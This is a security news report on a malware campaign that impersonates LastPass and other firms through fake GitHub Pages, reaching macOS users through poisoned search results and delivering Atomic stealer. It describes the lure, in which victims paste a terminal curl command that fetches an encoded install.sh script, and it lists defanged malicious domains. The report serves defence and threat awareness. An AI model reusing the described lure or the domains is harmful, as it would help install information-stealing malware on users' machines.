Hackers Abuse GitHub Pages to Spread Stealer Malware to macOS Users

A sophisticated malware campaign is targeting Mac users through fraudulent GitHub repositories that masquerade as legitimate software downloads, with threat actors exploiting search engine optimization tactics to deliver malicious links directly to unsuspecting victims.

The LastPass Threat Intelligence, Mitigation, and Escalation team has identified an ongoing widespread infostealer operation that specifically targets macOS users through deceptive GitHub Pages designed to distribute the notorious Atomic stealer malware.

Search Engine Manipulation Drives Traffic to Malicious Sites

The campaign demonstrates advanced social engineering techniques by leveraging SEO poisoning to ensure malicious GitHub repositories appear at the top of search results on major platforms including Google and Bing.

When users search for legitimate software downloads, they encounter what appears to be official company repositories but are actually elaborate facades created by cybercriminals.

The threat actors have cast a wide net, targeting numerous high-profile organizations across multiple sectors including technology companies, financial institutions, and password management services.

Example of a phishing email impersonating LastPass to steal user information by urging verification of personal data 

LastPass researchers discovered two fraudulent GitHub sites impersonating their service, both created by the user “modhopmduck476” on September 16th.

These repositories featured convincing headlines incorporating company names and Mac-specific terminology such as “MacOS,” “Mac,” and “Premium on Macbook” to maximize their appeal to target demographics.

The malicious pages included links claiming to offer “Install LastPass on MacBook” that redirected victims to a secondary staging site at “ahoastock825[.]github[.]io/.github/lastpass.”

The attack employs a sophisticated multi-stage delivery mechanism that begins when victims visit the fraudulent GitHub page and are redirected to “macprograms-pro[.]com/mac-git-2-download.html.”

This secondary site instructs users to copy and paste a terminal command that initiates a CURL request to a base64-encoded URL.

The encoded URL decodes to “bonoud[.]com/get3/install.sh,” which then downloads a payload disguised as an “Update” file to the system’s temporary directory.

Malware detection report showing multiple security vendors identifying a macOS Trojan dropper malware, consistent with Atomic stealer analysis 

Security teams across the industry are now actively monitoring for indicators of compromise related to this campaign, with LastPass leading takedown efforts against the fraudulent repositories targeting their customers.

The company has successfully removed the identified malicious sites and continues to pursue disruption activities while sharing threat intelligence with other security organizations to combat this evolving threat landscape.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.